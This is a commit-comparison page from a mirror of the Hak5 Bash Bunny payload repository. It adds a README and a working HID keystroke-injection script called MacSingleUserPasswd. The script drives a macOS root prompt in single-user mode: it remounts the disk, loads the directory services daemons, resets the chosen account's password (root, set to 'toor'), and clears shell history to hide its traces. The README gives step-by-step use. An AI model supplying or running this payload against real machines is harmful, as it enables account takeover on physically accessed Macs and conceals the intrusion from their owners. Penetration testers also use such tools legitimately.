hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: hak5:628b787642721f02126a2a7caee76452960722de
Branches Tags
hak5:master
hak5:revert-583-master
hak5:cleanup
hak5:v1.2
hak5:v1.1
hak5:v1.0
...
compare: hak5:708cb4f8c874b65a4e0bf5f15baae233623ba141
Branches Tags
hak5:master
hak5:revert-583-master
hak5:cleanup
hak5:v1.2
hak5:v1.1
hak5:v1.0

4 Commits
628b787642 ... 708cb4f8c8

Author SHA1 Message Date
Aidan Holland 708cb4f8c8
Merge 509fd26e52 into 8d901a02a8 2024-09-05 12:26:44 -04:00
Aidan Holland 509fd26e52
Create README.md 2018-02-01 21:05:12 -05:00
Aidan Holland d7472465dd
Update payload.txt 2018-02-01 20:48:25 -05:00
Aidan Holland 745517d25d
Create payload.txt 2018-02-01 20:45:29 -05:00
2 changed files with 68 additions and 0 deletions
Show Stats Expand all files Collapse all files

32
payloads/library/credentials/MacSingleUserPasswd/README.md Normal file
View File

@ -0,0 +1,32 @@
# MacSingleUserPasswd
* Author: [thehappydinoa](https://github.com/thehappydinoa)
* Version: Version 1.0.2
* Target: macOS
## Description
Quickly and efficiently updates the password of a user though the single user mode on macOS.
## Configuration
Update `ACCOUNT` and `PASSWD` accordingly.
## Use
1. Restart the Mac.
2. Hold `command` and `s` until you see white text on the screen.
3. Once you come to the `:/ root#` prompt plug in the Bash Bunny.
It should look similar to this:
![Single User Mode](http://cdn2.tekrevue.com/wp-content/uploads/2014/09/single-user-mode.jpg)
4. When it finishs mounting the root directory `/` it will tell you to `Change switch position now`. At this point you should change the switch position.
5. When you see the FINISHED LED you can unplug and wait for the machine to restart.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| STAGE1 | Mounts root directory |
| STAGE2 | Runs WAIT extension |
| STAGE3 | Loads LaunchDaemons for user management |
| FINISH | Clears history and restarts |

36
payloads/library/credentials/MacSingleUserPasswd/payload.txt Normal file
View File

@ -0,0 +1,36 @@
#!/bin/bash
#
# Title: MacSingleUserPasswd
# Description: Automatically resets user password on macOS through single user mode
# Author: thehappydinoa
# Version: 1.0.2
# Category: Credentials
# Target: macOS
# Attackmodes: HID
#
## OPTIONS
ACCOUNT="root"
PASSWD="toor"
## ATTACK
LED STAGE1
ATTACKMODE HID
Q STRING /sbin/fsck -y\; /sbin/mount -uw /\; echo "Change switch position now"\;
Q ENTER
LED STAGE2
WAIT
LED STAGE3
Q STRING launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist\; launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist\; passwd $ACCOUNT\;
Q ENTER
Q STRING $PASSWD
Q ENTER
Q STRING $PASSWD
Q ENTER
LED CLEANUP
Q STRING history -c\; exit\;
Q ENTER
LED FINISH